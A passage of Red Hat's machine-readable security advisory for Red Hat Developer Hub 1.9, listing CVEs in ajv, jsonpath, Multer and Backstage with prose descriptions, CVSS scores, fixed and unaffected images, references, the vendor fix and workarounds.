"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64"
],
"known_not_affected": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-69873"
},
{
"category": "external",
"summary": "RHBZ#2439070",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2439070"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-69873",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-69873"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-69873",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69873"
},
{
"category": "external",
"summary": "https://github.com/EthanKim88/ethan-cve-disclosures/blob/main/CVE-2025-69873-ajv-ReDoS.md",
"url": "https://github.com/EthanKim88/ethan-cve-disclosures/blob/main/CVE-2025-69873-ajv-ReDoS.md"
}
],
"release_date": "2026-02-11T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-07T13:22:11+00:00",
"details": "For more about Red Hat Developer Hub, see References links",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6802"
},
{
"category": "workaround",
"details": "To mitigate this issue, disable the $data feature if your application does not require it. If $data must be used, implement strict validation of the input fields that are referenced by the pattern keyword to ensure they contain only expected and safe characters.",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "ajv: ReDoS via $data reference"
},
{
"cve": "CVE-2026-1615",
"cwe": {
"id": "CWE-94",
"name": "Improper Control of Generation of Code (\u0027Code Injection\u0027)"
},
"discovery_date": "2026-02-09T11:10:57.572082+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2437875"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the jsonpath component. This vulnerability allows a remote attacker to achieve arbitrary code execution by supplying a malicious JSON Path expression. The component\u0027s reliance on the `static-eval` module for processing user-supplied input leads to unsafe evaluation. Successful exploitation can result in Remote Code Execution (RCE) in Node.js environments or Cross-site Scripting (XSS) in browser contexts.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "jsonpath: jsonpath: Arbitrary Code Execution via unsafe JSON Path expression evaluation",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Red Hat Product Security team has rated this vulnerability as Important as it may allows arbitrary code execution when processing untrusted JSON Path expressions. This can lead to Remote Code Execution in Node.js environments or Cross-site Scripting in browser contexts. In some contexts it may be possible to remotely exploit this flaw without any privileges. However, within Red Hat products the jsonpath component is used as a transitive dependency or does not directly handle user input. This context reduces exposure and criticality of this vulnerability.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64"
],
"known_not_affected": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-1615"
},
{
"category": "external",
"summary": "RHBZ#2437875",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2437875"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-1615",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-1615"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-1615",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1615"
},
{
"category": "external",
"summary": "https://github.com/dchester/jsonpath/blob/c1dd8ec74034fb0375233abb5fdbec51ac317b4b/lib/handlers.js%23L243",
"url": "https://github.com/dchester/jsonpath/blob/c1dd8ec74034fb0375233abb5fdbec51ac317b4b/lib/handlers.js%23L243"
},
{
"category": "external",
"summary": "https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-15141219",
"url": "https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-15141219"
},
{
"category": "external",
"summary": "https://security.snyk.io/vuln/SNYK-JS-JSONPATH-13645034",
"url": "https://security.snyk.io/vuln/SNYK-JS-JSONPATH-13645034"
}
],
"release_date": "2026-02-09T05:00:09.050000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-07T13:22:11+00:00",
"details": "For more about Red Hat Developer Hub, see References links",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6802"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "jsonpath: jsonpath: Arbitrary Code Execution via unsafe JSON Path expression evaluation"
},
{
"cve": "CVE-2026-2359",
"cwe": {
"id": "CWE-772",
"name": "Missing Release of Resource after Effective Lifetime"
},
"discovery_date": "2026-02-27T16:01:27.340094+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2443350"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Multer, a Node.js middleware for handling `multipart/form-data`. A remote attacker can exploit this vulnerability by intentionally dropping a connection during a file upload. This can lead to a Denial of Service (DoS) due to resource exhaustion on the affected system.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "multer: Multer: Denial of Service via dropped file upload connections",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64"
],
"known_not_affected": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-2359"
},
{
"category": "external",
"summary": "RHBZ#2443350",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2443350"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-2359",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-2359"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-2359",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2359"
},
{
"category": "external",
"summary": "https://cna.openjsf.org/security-advisories.html",
"url": "https://cna.openjsf.org/security-advisories.html"
},
{
"category": "external",
"summary": "https://github.com/expressjs/multer/commit/cccf0fe0e64150c4f42ccf6654165c0d66b9adab",
"url": "https://github.com/expressjs/multer/commit/cccf0fe0e64150c4f42ccf6654165c0d66b9adab"
},
{
"category": "external",
"summary": "https://github.com/expressjs/multer/security/advisories/GHSA-v52c-386h-88mc",
"url": "https://github.com/expressjs/multer/security/advisories/GHSA-v52c-386h-88mc"
}
],
"release_date": "2026-02-27T15:42:08.088000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-07T13:22:11+00:00",
"details": "For more about Red Hat Developer Hub, see References links",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6802"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "multer: Multer: Denial of Service via dropped file upload connections"
},
{
"cve": "CVE-2026-3304",
"cwe": {
"id": "CWE-459",
"name": "Incomplete Cleanup"
},
"discovery_date": "2026-02-27T16:01:39.674165+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2443353"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Multer, a Node.js middleware. A remote attacker could exploit this vulnerability by sending specially crafted malformed requests. This could lead to resource exhaustion, resulting in a Denial of Service (DoS) for the application using Multer.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "multer: Multer: Denial of Service via malformed requests",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64"
],
"known_not_affected": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-3304"
},
{
"category": "external",
"summary": "RHBZ#2443353",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2443353"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-3304",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-3304"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-3304",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3304"
},
{
"category": "external",
"summary": "https://cna.openjsf.org/security-advisories.html",
"url": "https://cna.openjsf.org/security-advisories.html"
},
{
"category": "external",
"summary": "https://github.com/expressjs/multer/commit/739919097dde3921ec31b930e4b9025036fa74ee",
"url": "https://github.com/expressjs/multer/commit/739919097dde3921ec31b930e4b9025036fa74ee"
},
{
"category": "external",
"summary": "https://github.com/expressjs/multer/security/advisories/GHSA-xf7r-hgr6-v32p",
"url": "https://github.com/expressjs/multer/security/advisories/GHSA-xf7r-hgr6-v32p"
}
],
"release_date": "2026-02-27T15:44:37.187000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-07T13:22:11+00:00",
"details": "For more about Red Hat Developer Hub, see References links",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6802"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "multer: Multer: Denial of Service via malformed requests"
},
{
"cve": "CVE-2026-3520",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-03-04T17:01:43.432970+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2444584"
}
],
"notes": [
{
"category": "description",
"text": "A denial of service flaw was found in Multer, a Node.js middleware for handling `multipart/form-data`. A remote attacker can send specially crafted malformed requests which may induce a stack overflow. This can lead to a Denial of Service (DoS) making the service unavailable.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "multer: Multer: Denial of Service via malformed requests",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64"
],
"known_not_affected": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-3520"
},
{
"category": "external",
"summary": "RHBZ#2444584",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444584"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-3520",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-3520"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-3520",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3520"
},
{
"category": "external",
"summary": "https://cna.openjsf.org/security-advisories.html",
"url": "https://cna.openjsf.org/security-advisories.html"
},
{
"category": "external",
"summary": "https://github.com/expressjs/multer/commit/7e66481f8b2e6c54b982b34c152479e096ce2752",
"url": "https://github.com/expressjs/multer/commit/7e66481f8b2e6c54b982b34c152479e096ce2752"
},
{
"category": "external",
"summary": "https://github.com/expressjs/multer/security/advisories/GHSA-5528-5vmv-3xc2",
"url": "https://github.com/expressjs/multer/security/advisories/GHSA-5528-5vmv-3xc2"
}
],
"release_date": "2026-03-04T16:17:18.962000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-07T13:22:11+00:00",
"details": "For more about Red Hat Developer Hub, see References links",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6802"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "multer: Multer: Denial of Service via malformed requests"
},
{
"cve": "CVE-2026-24046",
"cwe": {
"id": "CWE-59",
"name": "Improper Link Resolution Before File Access (\u0027Link Following\u0027)"
},
"discovery_date": "2026-01-21T23:00:53.856026+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2431878"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Backstage. A symlink-based path traversal issue can be exploited in multiple Scaffolder actions and archive extraction utilities during template execution via malicious symlinks. An attacker with access to create and execute Scaffolder templates can read sensitive files, delete arbitrary files or write files outside the intended workspace, resulting in unauthorized information disclosure or system compromise.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "backstage/backend-defaults: backstage/plugin-scaffolder-backend: backstage/plugin-scaffolder-node: possible symlink path traversal in scaffolder actions",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "To exploit this issue, an attacker needs to have access to create and execute Scaffolder actions, specifically the debug:log, fs:delete actions and archive extractions, limiting the exposure of this flaw. Additionally, file systems operations are constrained by the permissions of the process, limiting the impact to files that can be accessed by Backstage. Due to these reasons, this vulnerability has been rated with an important severity.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64"
],
"known_not_affected": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-24046"
},
{
"category": "external",
"summary": "RHBZ#2431878",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431878"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-24046",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-24046"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-24046",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24046"
},
{
"category": "external",
"summary": "https://github.com/backstage/backstage/commit/c641c147ab371a9a8a2f5f67fdb7cb9c97ef345d",
"url": "https://github.com/backstage/backstage/commit/c641c147ab371a9a8a2f5f67fdb7cb9c97ef345d"
},
{
"category": "external",
"summary": "https://github.com/backstage/backstage/security/advisories/GHSA-rq6q-wr2q-7pgp",
"url": "https://github.com/backstage/backstage/security/advisories/GHSA-rq6q-wr2q-7pgp"
}
],
"release_date": "2026-01-21T22:36:30.794000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-07T13:22:11+00:00",
"details": "For more about Red Hat Developer Hub, see References links",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6802"
},
{
"category": "workaround",
"details": "To mitigate this issue, consider implementing strict access controls for Backstage Scaffolder templates. Restrict the ability to create and execute Scaffolder templates to trusted users only, utilizing the Backstage permissions framework. Additionally, audit existing templates for any symlink usage and consider running Backstage within a containerized environment with a highly restricted filesystem to limit potential impact.",
"product_ids": [
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-hub-rhel9@sha256:5e564d74dd0a96027d9283991bda32a13b87384a9c9572456ce318dfac7e9f7d_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-operator-bundle@sha256:6d52fc14afcaa18b7a09607fcdc34edf3b222030aa69cc91612a38191aca41aa_amd64",
"Red Hat Developer Hub 1.9:registry.redhat.io/rhdh/rhdh-rhel9-operator@sha256:4e4ab9dd3243274e6f378553e241ae8b9fdeed7fe2daaa7efb34f60ee46a2eef_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
